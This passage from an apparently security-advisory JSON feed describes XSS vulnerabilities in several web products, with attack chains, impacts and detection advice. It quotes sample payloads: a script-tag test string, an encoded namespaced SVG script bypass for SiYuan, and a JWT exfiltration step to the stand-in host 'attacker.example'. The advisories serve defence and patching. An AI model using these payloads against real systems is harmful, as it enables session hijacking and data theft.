Palette.","title":"Budibase Stored Cross-Site Scripting Vulnerability 
(CVE-2026-35218)","url":"https://feed.craftedsignal.io/briefs/2026-04-budibase-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-28754"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","manageengine"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eZohocorp ManageEngine Exchange Reporter Plus versions prior to 5802 are susceptible to a Stored Cross-Site Scripting (XSS) vulnerability within the Distribution Lists report. This flaw allows an attacker with low privileges to inject malicious JavaScript code into the report. When other users view the compromised report, the injected script executes, potentially leading to session hijacking, sensitive data theft, or unauthorized administrative actions. The vulnerability stems from insufficient input sanitization when generating the Distribution Lists report, a feature within the Exchange Reporter Plus application designed to provide insights into Exchange environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to ManageEngine Exchange Reporter Plus with low-privilege credentials.\u003c/li\u003e\n\u003cli\u003eAttacker navigates to the Distribution Lists report generation page.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing JavaScript code designed to execute upon rendering. 
This payload is injected via a field that contributes to the report.\u003c/li\u003e\n\u003cli\u003eThe application stores the malicious payload without proper sanitization within the Distribution Lists report data.\u003c/li\u003e\n\u003cli\u003eA privileged user views the Distribution Lists report through the web interface.\u003c/li\u003e\n\u003cli\u003eThe stored malicious JavaScript payload is rendered within the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe script executes within the context of the user\u0026rsquo;s session, potentially stealing cookies or other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the stolen credentials or session to perform unauthorized actions within the ManageEngine Exchange Reporter Plus application, such as accessing sensitive reports or modifying configurations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this Stored XSS vulnerability allows an attacker to compromise user accounts and potentially gain administrative access to the ManageEngine Exchange Reporter Plus application. This can lead to unauthorized access to sensitive Exchange environment data, including email addresses, distribution list memberships, and other configuration details. Given the broad adoption of ManageEngine products, this vulnerability could impact numerous organizations relying on Exchange Reporter Plus for monitoring and reporting. 
The impact is magnified because the injected script is stored, affecting multiple users who view the compromised report.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade ManageEngine Exchange Reporter Plus to version 5802 or later to patch CVE-2026-28754.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious URI Access to Distribution List Reports\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on the Distribution Lists report generation page to prevent the injection of malicious scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T11:17:05Z","date_published":"2026-04-03T11:17:05Z","id":"/briefs/2026-04-manageengine-xss/","summary":"Zohocorp ManageEngine Exchange Reporter Plus versions before 5802 are vulnerable to Stored XSS in the Distribution Lists report, allowing attackers to inject malicious scripts.","title":"ManageEngine Exchange Reporter Plus Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-manageengine-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.9,"id":"CVE-2026-34571"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["xss","web-application","cve-2026-34571"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCI4MS, a CodeIgniter 4-based CMS skeleton designed for production environments, is vulnerable to a stored XSS flaw within its backend user management system. Versions prior to 0.31.0.0 fail to adequately sanitize user-supplied input before rendering it in the administrative interface. This allows a malicious actor to inject persistent JavaScript code that executes automatically whenever a backend user accesses the compromised page. 
Successful exploitation grants the attacker the ability to hijack user sessions, escalate privileges to gain higher access levels, and potentially achieve complete control over administrative accounts. Users are advised to upgrade to version 0.31.0.0 or later to mitigate this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to the CI4MS backend with sufficient privileges to modify user profiles or other data within the user management section.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into a user profile field, such as the \u0026ldquo;username,\u0026rdquo; \u0026ldquo;email,\u0026rdquo; or any other editable field that is not properly sanitized.\u003c/li\u003e\n\u003cli\u003eThe crafted payload is submitted and stored in the CI4MS database without proper encoding or sanitization.\u003c/li\u003e\n\u003cli\u003eA backend administrator logs into the CI4MS administrative interface and navigates to the user management section.\u003c/li\u003e\n\u003cli\u003eThe vulnerable page retrieves the unsanitized data containing the malicious JavaScript from the database and renders it in the administrator\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code executes within the administrator\u0026rsquo;s browser session, allowing the attacker to perform actions on behalf of the administrator.\u003c/li\u003e\n\u003cli\u003eThe attacker can steal the administrator\u0026rsquo;s session cookie, allowing them to bypass authentication and gain persistent access to the administrative interface.\u003c/li\u003e\n\u003cli\u003eWith administrative access, the attacker can install malware, modify system configurations, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability in CI4MS can have severe 
consequences, potentially leading to complete compromise of the affected system. An attacker could gain full control over administrative accounts, allowing them to modify website content, install malicious plugins, or steal sensitive data. The vulnerability poses a significant risk to organizations using vulnerable versions of CI4MS to manage their websites.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade CI4MS to version 0.31.0.0 or later to patch the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect CI4MS XSS Attempt via HTTP POST\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding/escaping on all user-supplied data within the CI4MS application to prevent future XSS vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T22:16:21Z","date_published":"2026-04-01T22:16:21Z","id":"/briefs/2026-04-ci4ms-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in CI4MS versions prior to 0.31.0.0 allows attackers to inject persistent JavaScript code into the backend user management functionality, leading to session hijacking, privilege escalation, and full administrative account compromise.","title":"CI4MS Stored XSS Vulnerability in User Management","url":"https://feed.craftedsignal.io/briefs/2026-04-ci4ms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","filebrowser","cve-2026-34529"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFile Browser is a file management interface used for uploading, deleting, previewing, renaming, and editing files. A stored XSS vulnerability, identified as CVE-2026-34529, exists within the EPUB preview functionality of File Browser versions prior to 2.62.2. 
An attacker can exploit this vulnerability by crafting a malicious EPUB file containing embedded JavaScript. When a user previews the malicious EPUB file through the File Browser interface, the embedded JavaScript executes within their browser, potentially leading to session hijacking, defacement, or redirection to malicious websites. This vulnerability has been addressed in File Browser version 2.62.2.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious EPUB file containing embedded JavaScript designed for XSS exploitation.\u003c/li\u003e\n\u003cli\u003eAttacker uploads the malicious EPUB file to a File Browser instance. This could be achieved if the attacker has write access to the file system, via compromised credentials or anonymous upload functionality (if enabled).\u003c/li\u003e\n\u003cli\u003eA legitimate user, with access to the File Browser, navigates to the directory containing the malicious EPUB file.\u003c/li\u003e\n\u003cli\u003eThe user previews the EPUB file using the File Browser\u0026rsquo;s built-in preview function.\u003c/li\u003e\n\u003cli\u003eThe File Browser processes the EPUB file, triggering the vulnerable code in the EPUB preview functionality.\u003c/li\u003e\n\u003cli\u003eThe embedded JavaScript within the EPUB file executes in the user\u0026rsquo;s browser in the context of the File Browser application.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript payload can then perform actions such as stealing cookies, redirecting the user, or defacing the File Browser interface.\u003c/li\u003e\n\u003cli\u003eThe attacker can use the stolen cookies to impersonate the user or further compromise the File Browser instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary JavaScript code within the context of a 
user\u0026rsquo;s browser. This can lead to session hijacking, where an attacker steals a user\u0026rsquo;s session cookie and impersonates them, potentially gaining unauthorized access to sensitive files and system resources. Further consequences include defacement of the File Browser interface, redirection of users to malicious websites, and potentially further compromise of the server hosting the File Browser application depending on the permissions of the compromised user account.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade File Browser instances to version 2.62.2 or later to patch the XSS vulnerability (CVE-2026-34529).\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on file uploads to prevent the injection of malicious code.\u003c/li\u003e\n\u003cli\u003eConsider deploying a Content Security Policy (CSP) to restrict the execution of JavaScript from untrusted sources.\u003c/li\u003e\n\u003cli\u003eEnable logging on the webserver hosting File Browser to capture details of requests for EPUB files, which can be used to detect exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T21:17:00Z","date_published":"2026-04-01T21:17:00Z","id":"/briefs/2026-04-filebrowser-xss/","summary":"File Browser versions prior to 2.62.2 are vulnerable to stored cross-site scripting (XSS) via the EPUB preview function, allowing attackers to execute arbitrary JavaScript in a user's browser by embedding malicious code in a crafted EPUB file.","title":"File Browser EPUB Preview Stored XSS Vulnerability (CVE-2026-34529)","url":"https://feed.craftedsignal.io/briefs/2026-04-filebrowser-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2026-34748"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","cve-2026-34748","payloadcms"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePayload CMS is a free 
and open-source headless content management system. Prior to version 3.78.0, a stored Cross-Site Scripting (XSS) vulnerability (CVE-2026-34748) existed in the admin panel of @payloadcms/next. This vulnerability allows an authenticated user with write access to a collection to save malicious content, which, when viewed by another user, results in arbitrary JavaScript execution within their browser. Successful exploitation can lead to session hijacking, defacement, or other malicious actions performed on behalf of the victim user. The vulnerability was patched in version 3.78.0. This issue poses a risk to any organization using Payload CMS, particularly those where multiple users with differing levels of trust interact with the content management system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the Payload CMS admin panel with write access to a collection.\u003c/li\u003e\n\u003cli\u003eAttacker crafts malicious content containing a JavaScript payload, such as \u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker saves the malicious content within a collection in the CMS through the admin panel interface, likely using a text field or similar input.\u003c/li\u003e\n\u003cli\u003eThe CMS stores the malicious content in its database without proper sanitization or output encoding.\u003c/li\u003e\n\u003cli\u003eA different, authenticated user accesses the collection containing the attacker\u0026rsquo;s malicious content through the admin panel using their web browser.\u003c/li\u003e\n\u003cli\u003eThe CMS retrieves the malicious content from the database and renders it in the victim user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the injected JavaScript code within the context of the Payload CMS web 
application.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves XSS, potentially gaining access to the victim\u0026rsquo;s session cookies, defacing the admin panel, or redirecting the user to a phishing site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability (CVE-2026-34748) in Payload CMS can lead to several negative consequences. An attacker can hijack the session of an administrator, potentially gaining full control over the CMS and its managed content. The attacker can also deface the admin panel, inject malicious links, or redirect users to phishing sites. Given the nature of content management systems, a successful XSS attack could lead to widespread distribution of malicious content to website visitors, ultimately harming the organization\u0026rsquo;s reputation and potentially leading to data breaches.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Payload CMS to version 3.78.0 or later to patch CVE-2026-34748, as indicated in the overview.\u003c/li\u003e\n\u003cli\u003eImplement a Content Security Policy (CSP) to restrict the sources from which the browser is permitted to load resources to mitigate potential XSS exploitation.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule targeting script tag injection within HTTP request parameters to detect potential exploitation attempts against web applications.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual activity related to the Payload CMS admin panel, focusing on requests containing potentially malicious JavaScript code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T20:16:27Z","date_published":"2026-04-01T20:16:27Z","id":"/briefs/2026-04-payloadcms-xss/","summary":"A stored Cross-Site Scripting (XSS) vulnerability exists in Payload CMS versions prior to 3.78.0, allowing authenticated users 
with write access to inject malicious scripts that execute in the browsers of other users.","title":"Payload CMS Stored XSS Vulnerability (CVE-2026-34748)","url":"https://feed.craftedsignal.io/briefs/2026-04-payloadcms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["sonicwall","email security","xss","dos","data manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities in the SonicWall Email Security Appliance allow a remote, authenticated attacker with administrative privileges to perform various malicious actions. This includes cross-site scripting (XSS) attacks, data manipulation, and denial-of-service (DoS) conditions. This poses a significant threat to organizations using the affected appliance as it can lead to data breaches, service disruption, and unauthorized access. Defenders should prioritize patching and implementing detection mechanisms to mitigate these risks, though no version information or CVEs are given.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the SonicWall Email Security Appliance with administrative privileges through compromised credentials or exploiting an authentication bypass vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a cross-site scripting (XSS) vulnerability to inject malicious scripts into web pages viewed by other administrators.\u003c/li\u003e\n\u003cli\u003eThe injected XSS scripts execute within the context of other administrator sessions, allowing the attacker to steal credentials or perform actions on their behalf.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a data manipulation vulnerability to modify sensitive data stored within the appliance, potentially altering email configurations or security settings.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a separate 
vulnerability to trigger a denial-of-service (DoS) condition, rendering the email security appliance unavailable to users.\u003c/li\u003e\n\u003cli\u003eThe DoS condition disrupts email flow, preventing users from sending or receiving messages.\u003c/li\u003e\n\u003cli\u003eThrough data manipulation and XSS, the attacker gains persistent control over the Email Security Appliance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could lead to unauthorized access to sensitive email data, manipulation of email security settings, and complete disruption of email services. The lack of specifics makes it impossible to determine the exact number of victims or specific sectors targeted. However, any organization using the SonicWall Email Security Appliance is potentially at risk. This can result in significant financial losses, reputational damage, and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor SonicWall Email Security Appliance logs for suspicious activity indicative of unauthorized access or data manipulation.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect potential XSS attacks against the SonicWall Email Security Appliance web interface.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect unauthorized changes to system files commonly associated with data manipulation attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T10:39:09Z","date_published":"2026-04-01T10:39:09Z","id":"/briefs/2024-01-sonicwall-email-security-vulns/","summary":"A remote, authenticated attacker with administrator rights can exploit multiple vulnerabilities in SonicWall Email Security Appliance to perform cross-site scripting, manipulate data, or cause a denial-of-service.","title":"SonicWall Email Security Appliance Multiple 
Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2024-01-sonicwall-email-security-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["vulnerability","dos","xss","ibm"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in IBM App Connect Enterprise that could be exploited by a remote, anonymous attacker. Successful exploitation could lead to a denial-of-service (DoS) condition, rendering the application unavailable, or the bypass of existing security measures. The security bypass could enable cross-site scripting (XSS) attacks, potentially compromising user data and system integrity. IBM App Connect Enterprise is an integration platform that connects applications and data across a variety of environments, making it a critical component for many organizations. The lack of specific CVEs in the advisory makes patching and specific detection challenging but highlights the need for broad monitoring of related activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable IBM App Connect Enterprise instance exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request designed to exploit a specific vulnerability.\u003c/li\u003e\n\u003cli\u003eThe malicious request is sent to the vulnerable IBM App Connect Enterprise server.\u003c/li\u003e\n\u003cli\u003eIf the attack targets a DoS vulnerability, the server becomes overwhelmed with the malicious request, leading to service disruption.\u003c/li\u003e\n\u003cli\u003eIf the attack targets a security bypass, the attacker injects malicious code into the application.\u003c/li\u003e\n\u003cli\u003eThe injected code executes in the context of a user\u0026rsquo;s session.\u003c/li\u003e\n\u003cli\u003eThe attacker steals sensitive information or performs actions on 
behalf of the user (XSS).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can have significant consequences, potentially disrupting critical business processes dependent on IBM App Connect Enterprise. While the exact number of affected organizations remains unknown, the widespread use of this platform suggests a potentially large impact. A successful DoS attack can lead to downtime and financial losses. A successful XSS attack can lead to data breaches, compromised user accounts, and further exploitation of internal systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious HTTP requests targeting IBM App Connect Enterprise, looking for unusual patterns or malformed URLs (category: \u003ccode\u003ewebserver\u003c/code\u003e, product: \u003ccode\u003elinux\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eImplement and tune the provided Sigma rule to detect potential XSS attempts by monitoring for common XSS payloads in HTTP request parameters.\u003c/li\u003e\n\u003cli\u003eReview IBM\u0026rsquo;s official security advisories for specific patch information as it becomes available, and apply patches immediately to mitigate these vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T09:21:09Z","date_published":"2026-04-01T09:21:09Z","id":"/briefs/2026-04-ibm-app-connect/","summary":"A remote, anonymous attacker can exploit multiple vulnerabilities in IBM App Connect Enterprise to cause a denial-of-service condition or bypass security measures, enabling cross-site scripting attacks.","title":"IBM App Connect Enterprise Multiple 
Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2026-04-ibm-app-connect/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","siyuan","svg","reflected-xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan Note, a note-taking application, is susceptible to a reflected XSS vulnerability in its dynamic icon generation functionality. This flaw, present in versions prior to commit f09953afc57a, arises from an insufficient sanitization of SVG content, specifically failing to account for namespace prefixes in SVG elements. The vulnerability resides in the \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e endpoint, which is accessible without authentication.  An attacker can exploit this by crafting a malicious SVG payload containing namespaced \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags (e.g., \u003ccode\u003e\u0026lt;x:script xmlns:x=\u0026quot;http://www.w3.org/2000/svg\u0026quot;\u0026gt;\u003c/code\u003e), which bypasses the application\u0026rsquo;s XSS mitigation measures. Successful exploitation allows arbitrary JavaScript execution within the context of the victim\u0026rsquo;s SiYuan Note instance, potentially leading to data theft or other malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious URL targeting the \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e endpoint with the \u003ccode\u003etype=8\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe crafted URL includes a \u003ccode\u003econtent\u003c/code\u003e parameter containing a specially crafted SVG payload. 
This SVG payload leverages a namespace prefix to bypass the \u003ccode\u003eSanitizeSVG\u003c/code\u003e function\u0026rsquo;s intended filtering, e.g., \u003ccode\u003e%3C%2Fx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe victim, either unknowingly or through social engineering, opens the malicious URL in their browser.\u003c/li\u003e\n\u003cli\u003eThe SiYuan server processes the request without proper sanitization, inserting the attacker-controlled content into the SVG, and serves the response with \u003ccode\u003eContent-Type: image/svg+xml\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe browser\u0026rsquo;s XML parser interprets the namespace prefix, resolving it to the SVG namespace, and executes the embedded JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe JavaScript code executes within the security context of the SiYuan application (\u003ccode\u003ehttp://\u0026lt;siyuan-host\u0026gt;:6806\u003c/code\u003e), due to \u003ccode\u003eAccess-Control-Allow-Origin: *\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s script can now interact with the SiYuan API using the victim\u0026rsquo;s session cookies.\u003c/li\u003e\n\u003cli\u003eThe attacker can perform actions such as reading notes, exporting data, or modifying settings without authentication.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability poses a significant risk to SiYuan Note users, particularly those whose instances are reachable on a local network. An attacker could potentially compromise sensitive information, manipulate user data, or gain unauthorized access to the application. The ease of exploitation and the absence of authentication requirements make this vulnerability particularly dangerous. 
Because SiYuan sets \u003ccode\u003eAccess-Control-Allow-Origin: *\u003c/code\u003e and the script runs same-origin, it can call any API endpoint using the victim\u0026rsquo;s existing session cookies, including endpoints to read all notes, export data, or modify settings.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade SiYuan Note to a version that includes the fix for commit f09953afc57a to remediate the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect SiYuan SVG XSS Attempt\u0026rdquo; to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e containing SVG payloads with namespace-prefixed script tags, as demonstrated in the PoC.\u003c/li\u003e\n\u003cli\u003eConsider implementing a Content Security Policy (CSP) on the SiYuan server to restrict the execution of inline JavaScript.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T00:30:01Z","date_published":"2026-04-01T00:30:01Z","id":"/briefs/2026-04-siyuan-xss/","summary":"SiYuan Note versions prior to the fix for commit f09953afc57a are vulnerable to reflected cross-site scripting (XSS) via a namespace prefix bypass in the SanitizeSVG function when handling dynamic icons, allowing unauthenticated attackers to execute arbitrary JavaScript in a victim's browser.","title":"SiYuan Note Reflected XSS Vulnerability in SVG Processing","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":4.8,"id":"CVE-2024-35236"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["filebrowser","xss","epub","cve-2026-34529"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFile Browser, a web-based file management application, is susceptible to stored XSS attacks in versions 2.62.1 and 
earlier. The vulnerability stems from the application\u0026rsquo;s EPUB preview functionality, which allows scripted content (\u003ccode\u003eallowScriptedContent: true\u003c/code\u003e) to execute within an iframe.  The iframe\u0026rsquo;s sandbox is misconfigured, including both \u003ccode\u003eallow-scripts\u003c/code\u003e and \u003ccode\u003eallow-same-origin\u003c/code\u003e, effectively bypassing the intended security restrictions. An attacker can upload a specially crafted EPUB file containing malicious JavaScript code. When a user previews the file, the embedded JavaScript executes in their browser, enabling session hijacking via JWT token theft, data exfiltration, and potential privilege escalation if the victim is an administrator.  This vulnerability is similar to CVE-2024-35236 found in audiobookshelf, highlighting a recurring pattern of insecure EPUB handling.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious EPUB file containing embedded JavaScript designed to steal JWT tokens and exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to the File Browser application with a valid, potentially low-privilege, user account.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious EPUB file to the File Browser server via the \u003ccode\u003e/api/resources\u003c/code\u003e endpoint, potentially overwriting existing files using the \u003ccode\u003eoverride=true\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe server stores the malicious EPUB file.\u003c/li\u003e\n\u003cli\u003eA victim, potentially an administrator, views the uploaded EPUB file through the File Browser\u0026rsquo;s web interface, triggering the EPUB preview function.\u003c/li\u003e\n\u003cli\u003eThe application renders the EPUB file within an iframe. 
Due to the \u003ccode\u003eallowScriptedContent\u003c/code\u003e setting and misconfigured sandbox, the embedded JavaScript executes.\u003c/li\u003e\n\u003cli\u003eThe JavaScript steals the victim\u0026rsquo;s JWT token from \u003ccode\u003ewindow.parent.localStorage\u003c/code\u003e and exfiltrates it to an attacker-controlled server (\u003ccode\u003ehttps://attacker.example/?stolen=\u003c/code\u003e). It may also attempt to gather additional information, such as the victim\u0026rsquo;s public IP address by requesting \u003ccode\u003ehttps://ifconfig.me/ip\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen JWT token to hijack the victim\u0026rsquo;s session, potentially gaining administrative privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability allows attackers to steal JWT tokens, leading to full session hijacking and potential privilege escalation. A low-privilege user with upload permissions can compromise administrator accounts. This can lead to unauthorized access to sensitive files, data exfiltration, and modification or deletion of critical data. 
The vulnerability affects File Browser instances version 2.62.1 and earlier.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply patches or upgrade File Browser to a version greater than 2.62.1 to mitigate CVE-2026-34529.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect File Browser EPUB XSS Attempt\u003c/code\u003e to identify potential exploitation attempts by monitoring for network connections to \u003ccode\u003eifconfig.me\u003c/code\u003e originating from the File Browser application.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect File Browser JWT Exfiltration\u003c/code\u003e to detect potential exfiltration of JWT tokens by monitoring network connections to \u003ccode\u003eattacker.example\u003c/code\u003e with a \u003ccode\u003estolen\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eDisable EPUB preview functionality or sanitize EPUB files before rendering them to prevent the execution of malicious scripts. 
This addresses the root cause by preventing attacker-controlled JavaScript execution.\u003c/li\u003e\n\u003cli\u003eReview and harden the iframe sandbox configuration used for EPUB previews to restrict access to sensitive resources and prevent script execution, if preview functionality cannot be disabled.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T23:44:36Z","date_published":"2026-03-31T23:44:36Z","id":"/briefs/2024-07-filebrowser-xss/","summary":"File Browser version 2.62.1 and earlier is vulnerable to stored cross-site scripting (XSS) via crafted EPUB files, allowing attackers to execute arbitrary JavaScript in a victim's browser by exploiting the application's misconfigured iframe sandbox and stealing sensitive information like JWT tokens.","title":"File Browser Stored XSS via Crafted EPUB File","url":"https://feed.craftedsignal.io/briefs/2024-07-filebrowser-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-4267"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","reflected-xss","cve-2026-4267"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Query Monitor plugin for WordPress, a developer tool panel, is susceptible to a reflected Cross-Site Scripting (XSS) vulnerability. Identified as CVE-2026-4267, this flaw exists in all versions up to and including 3.20.3. The vulnerability arises from the plugin\u0026rsquo;s failure to adequately sanitize input and escape output related to the \u003ccode\u003e$_SERVER['REQUEST_URI']\u003c/code\u003e parameter. 
